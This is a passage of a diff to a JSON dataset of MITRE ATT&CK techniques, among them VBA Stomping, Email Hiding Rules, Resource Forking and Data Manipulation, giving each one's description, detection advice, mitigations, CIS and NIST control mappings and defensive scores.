+        "supertechnique": "T1564",
+        "subtechniques": [],
         "mitigations": [
-            {
-                "mid": "M1047",
-                "name": "Audit",
-                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                "url": "https://attack.mitre.org/mitigations/M1047"
-            },
-            {
-                "mid": "M1045",
-                "name": "Code Signing",
-                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                "url": "https://attack.mitre.org/mitigations/M1045"
-            },
             {
                 "mid": "M1042",
                 "name": "Disable or Remove Feature or Program",
@@ -11927,151 +34599,121 @@
                 "url": "https://attack.mitre.org/mitigations/M1042"
             },
             {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
-            },
-            {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
             }
         ],
-        "cumulative_score": 0.4623017723809524,
-        "adjusted_score": 0.4623017723809524,
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "2.7",
+            "2.3",
+            "2.5",
             "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
+            "4.8",
+            "7.7",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
-            "AC-16",
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "CA-8",
-            "CM-11",
-            "CM-2",
-            "CM-5",
-            "CM-6",
-            "CM-8",
-            "IA-2",
-            "RA-5",
-            "SA-10",
-            "SA-11",
-            "SC-16",
-            "SI-14",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "SI-10",
             "SI-4",
-            "SI-7",
-            "SR-11",
-            "SR-4",
-            "SR-5",
-            "SR-6"
+            "SI-7"
         ],
         "process_coverage": true,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
-        "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.3523809523809524,
-            "mitigation_score": 0.5818181818181818,
-            "detection_score": 0.1
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00992082
+        "cloud_coverage": true,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1518",
-        "name": "Software Discovery",
-        "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).",
-        "url": "https://attack.mitre.org/techniques/T1518",
+        "tid": "T1564.007",
+        "name": "Hide Artifacts: VBA Stomping",
+        "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)",
+        "url": "https://attack.mitre.org/techniques/T1564/007",
         "tactics": [
-            "Discovery"
+            "Defense Evasion"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)\n\nIf the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)",
         "platforms": [
-            "Azure AD",
-            "Google Workspace",
-            "IaaS",
             "Linux",
-            "Office 365",
-            "SaaS",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "Firewall: Firewall Enumeration",
-            "Firewall: Firewall Metadata",
-            "Process: OS API Execution",
-            "Process: Process Creation"
+            "File: File Metadata",
+            "Script: Script Execution"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
+        "is_subtechnique": true,
+        "supertechnique": "T1564",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1518.001",
-                "name": "Software Discovery: Security Software Discovery",
-                "url": "https://attack.mitre.org/techniques/T1518/001",
-                "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)",
-                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.",
-                "mitigations": []
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
             }
         ],
-        "mitigations": [],
-        "cumulative_score": 0.1626814238095238,
-        "adjusted_score": 0.1626814238095238,
+        "cumulative_score": 0.2142857142857143,
+        "adjusted_score": 0.2142857142857143,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
+        "has_sigma": false,
+        "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5",
+            "16.10"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "SI-4"
+        ],
         "process_coverage": true,
-        "network_coverage": true,
-        "file_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.023809523809523808,
-            "detection_score": 0.05
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.0388719
+        "hardware_coverage": false
     },
     {
-        "tid": "T1525",
-        "name": "Implant Internal Image",
-        "description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n\nA tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)",
-        "url": "https://attack.mitre.org/techniques/T1525",
+        "tid": "T1564.008",
+        "name": "Hide Artifacts: Email Hiding Rules",
+        "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)",
+        "url": "https://attack.mitre.org/techniques/T1564/008",
         "tactics": [
-            "Persistence"
+            "Defense Evasion"
         ],
-        "detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.\n\nIn containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. ",
+        "detection": "Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.\n\nOn Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule and Set-InboxRule PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.(Citation: MacOS Email Rules)",
         "platforms": [
-            "Containers",
-            "IaaS"
+            "Linux",
+            "Office 365",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
-            "Image: Image Creation",
-            "Image: Image Modification"
+            "Application Log: Application Log Content",
+            "Command: Command Execution",
+            "File: File Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1564",
         "subtechniques": [],
         "mitigations": [
             {
@@ -12079,694 +34721,798 @@
                 "name": "Audit",
                 "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
                 "url": "https://attack.mitre.org/mitigations/M1047"
-            },
-            {
-                "mid": "M1045",
-                "name": "Code Signing",
-                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                "url": "https://attack.mitre.org/mitigations/M1045"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.3429840628571429,
-        "adjusted_score": 0.3429840628571429,
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
         "has_car": false,
-        "has_sigma": true,
+        "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8",
-            "18.3",
-            "18.5"
-        ],
+        "cis_controls": [],
         "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "CA-8",
-            "CM-2",
+            "AC-4",
+            "CM-3",
             "CM-5",
-            "CM-6",
             "CM-7",
-            "IA-2",
-            "IA-9",
-            "RA-5",
-            "SI-2",
+            "IR-5",
             "SI-3",
             "SI-4",
             "SI-7"
         ],
-        "process_coverage": false,
+        "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
-        "cloud_coverage": true,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.24285714285714288,
-            "mitigation_score": 0.45454545454545453,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00012692
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1526",
-        "name": "Cloud Service Discovery",
-        "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. \n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)",
-        "url": "https://attack.mitre.org/techniques/T1526",
+        "tid": "T1564.009",
+        "name": "Hide Artifacts: Resource Forking",
+        "description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)",
+        "url": "https://attack.mitre.org/techniques/T1564/009",
         "tactics": [
-            "Discovery"
+            "Defense Evasion"
         ],
-        "detection": "Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nNormal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.",
+        "detection": "Identify files with the com.apple.ResourceFork extended attribute and large data amounts stored in resource forks. \n\nMonitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. ",
         "platforms": [
-            "Azure AD",
-            "Google Workspace",
-            "IaaS",
-            "Office 365",
-            "SaaS"
+            "macOS"
         ],
         "data_sources": [
-            "Cloud Service: Cloud Service Enumeration",
-            "Cloud Service: Cloud Service Metadata"
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Metadata",
+            "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1564",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.14761904761904762,
-        "adjusted_score": 0.14761904761904762,
+        "mitigations": [
+            {
+                "mid": "M1013",
+                "name": "Application Developer Guidance",
+                "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.",
+                "url": "https://attack.mitre.org/mitigations/M1013"
+            }
+        ],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [],
-        "nist_controls": [],
+        "nist_controls": [
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SA-10",
+            "SC-4",
+            "SC-44",
+            "SC-6",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
-        "cloud_coverage": true,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.047619047619047616,
-            "detection_score": 0.1
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1528",
-        "name": "Steal Application Access Token",
-        "description": "Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.\n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nAdversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)",
-        "url": "https://attack.mitre.org/techniques/T1528",
+        "tid": "T1565",
+        "name": "Data Manipulation",
+        "description": "Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+        "url": "https://attack.mitre.org/techniques/T1565",
         "tactics": [
-            "Credential Access"
+            "Impact"
         ],
-        "detection": "Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.\n\nSecurity analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.\n\nAdministrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.",
+        "detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.",
         "platforms": [
-            "Azure AD",
-            "Google Workspace",
-            "Office 365",
-            "SaaS"
+            "Linux",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
-            "User Account: User Account Modification"
+            "File: File Creation",
+            "File: File Deletion",
+            "File: File Metadata",
+            "File: File Modification",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Process: OS API Execution"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [],
+        "subtechniques": [
+            {
+                "tid": "T1565.001",
+                "name": "Data Manipulation: Stored Data Manipulation",
+                "url": "https://attack.mitre.org/techniques/T1565/001",
+                "description": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+                "detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.",
+                "mitigations": [
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    },
+                    {
+                        "mid": "M1029",
+                        "name": "Remote Data Storage",
+                        "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
+                        "url": "https://attack.mitre.org/mitigations/M1029"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1565.002",
+                "name": "Data Manipulation: Transmitted Data Manipulation",
+                "url": "https://attack.mitre.org/techniques/T1565/002",
+                "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+                "detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. ",
+                "mitigations": [
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    }
+                ]
+            },
+            {
+                "tid": "T1565.003",
+                "name": "Data Manipulation: Runtime Data Manipulation",
+                "url": "https://attack.mitre.org/techniques/T1565/003",
+                "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+                "detection": "Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.",
+                "mitigations": [
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            }
+        ],
         "mitigations": [
             {
-                "mid": "M1047",
-                "name": "Audit",
-                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                "url": "https://attack.mitre.org/mitigations/M1047"
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
             },
             {
-                "mid": "M1021",
-                "name": "Restrict Web-Based Content",
-                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1021"
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
             },
             {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1029",
+                "name": "Remote Data Storage",
+                "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
+                "url": "https://attack.mitre.org/mitigations/M1029"
             },
             {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             }
         ],
-        "cumulative_score": 0.6166666666666667,
-        "adjusted_score": 0.6166666666666667,
+        "cumulative_score": 0.4792060285714286,
+        "adjusted_score": 0.4792060285714286,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": false,
         "cis_controls": [
-            "2.3",
-            "2.5",
+            "3.11",
+            "3.12",
             "3.3",
-            "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "14.1",
-            "14.2",
-            "14.3",
-            "14.6",
-            "18.3",
-            "18.5"
+            "4.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "11.1",
+            "11.2",
+            "11.3",
+            "11.4",
+            "11.5",
+            "12.2",
+            "12.8",
+            "16.8",
+            "3.10"
         ],
         "nist_controls": [
-            "AC-10",
-            "AC-2",
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-20",
             "AC-3",
             "AC-4",
-            "AC-5",
-            "AC-6",
             "CA-7",
-            "CA-8",
             "CM-2",
-            "CM-5",
             "CM-6",
-            "IA-2",
-            "IA-4",
-            "IA-5",
-            "IA-8",
-            "RA-5",
-            "SA-11",
-            "SA-15",
-            "SI-4"
+            "CM-7",
+            "CM-8",
+            "CP-10",
+            "CP-6",
+            "CP-7",
+            "CP-9",
+            "SC-28",
+            "SC-36",
+            "SC-4",
+            "SC-46",
+            "SC-7",
+            "SI-12",
+            "SI-16",
+            "SI-23",
+            "SI-4",
+            "SI-7"
         ],
-        "process_coverage": false,
-        "network_coverage": false,
+        "process_coverage": true,
+        "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.3666666666666667,
-            "mitigation_score": 0.5818181818181818,
-            "detection_score": 0.13
+            "combined_score": 0.4285714285714286,
+            "mitigation_score": 0.7636363636363637,
+            "detection_score": 0.06
         },
-        "choke_point_score": 0.25,
-        "prevalence_score": 0
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.0006346
     },
     {
-        "tid": "T1529",
-        "name": "System Shutdown/Reboot",
